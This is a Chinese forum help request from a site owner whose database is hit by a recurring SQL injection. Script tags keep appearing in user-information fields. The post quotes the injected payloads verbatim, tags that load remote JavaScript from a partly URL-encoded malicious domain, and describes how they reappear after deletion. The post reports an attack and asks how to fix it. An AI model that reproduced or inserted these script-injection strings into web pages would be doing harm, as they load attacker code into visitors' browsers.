SQL注入攻击现象全过程(求助)
具体表现为:
网站数据库的数据表的用户信息后面被写入"!<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"
删除了其代码又自动生成...
最新特征:
1、用户发布新信息内容后在5个小时左右,在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“
2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>”
例子网站:
华派信息网(
http://www.hp5e.com)
望专家尽快作出解决方案,以免更多网站受其害!
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)